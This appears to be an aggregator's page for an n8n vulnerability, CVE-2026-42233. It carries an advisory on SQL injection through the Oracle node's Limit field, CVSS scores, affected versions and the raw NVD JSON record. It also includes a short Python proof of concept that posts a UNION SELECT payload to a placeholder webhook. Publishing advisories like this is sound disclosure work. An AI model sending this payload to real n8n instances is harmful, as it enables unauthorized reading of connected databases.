Security Vulnerability Report
中文
CVE-2026-42233 CVSS 9.8 CRITICAL

CVE-2026-42233

Published: 2026-05-04 19:16:06
Last Modified: 2026-05-06 18:07:23
Source: [email protected]

Description

n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, a flaw in the Oracle Database node's select operation allowed user-controlled input passed into the Limit field via expressions to be interpolated directly into the SQL query without sanitization or parameterization. In workflows where external input is passed into the Limit field (e.g., from a webhook), an attacker could inject arbitrary SQL and exfiltrate data from the connected Oracle database. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:n8n:n8n:*:*:*:*:enterprise:node.js:*:* - VULNERABLE
cpe:2.3:a:n8n:n8n:*:*:*:*:enterprise:node.js:*:* - VULNERABLE
cpe:2.3:a:n8n:n8n:2.18.0:*:*:*:enterprise:node.js:*:* - VULNERABLE
n8n < 1.123.32
n8n < 2.17.4
n8n < 2.18.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-42233 # Target: n8n workflow with Oracle node using external input for Limit field target_url = "https://<target-n8n-instance>/webhook/hook-id" # SQL Injection payload to extract database version # Assuming the workflow maps the input 'limit' to the Oracle node's Limit field sql_payload = "1 UNION SELECT NULL, user, version FROM v$instance--" payload = { "limit": sql_payload } response = requests.post(target_url, json=payload) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check if the response or database logs indicate SQL execution.") else: print(f"[-] Request failed: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42233", "sourceIdentifier": "[email protected]", "published": "2026-05-04T19:16:05.847", "lastModified": "2026-05-06T18:07:22.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, a flaw in the Oracle Database node's select operation allowed user-controlled input passed into the Limit field via expressions to be interpolated directly into the SQL query without sanitization or parameterization. In workflows where external input is passed into the Limit field (e.g., from a webhook), an attacker could inject arbitrary SQL and exfiltrate data from the connected Oracle database. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:enterprise:node.js:*:*", "versionEndExcluding": "1.123.32", "matchCriteriaId": "A074B1B0-1C40-4969-A3D2-F4E86B4BAED3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:enterprise:node.js:*:*", "versionStartIncluding": "2.17.0", "versionEndExcluding": "2.17.4", "matchCriteriaId": "F00CA27A-4FD7-45A8-BE8D-DABFAD902806"}, {"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:2.18.0:*:*:*:enterprise:node.js:*:*", "matchCriteriaId": "D4858098-0175-4680-B6C9-C19CEB451DBA"}]}]}], "references": [{"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-r6jc-mpqw-m755", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.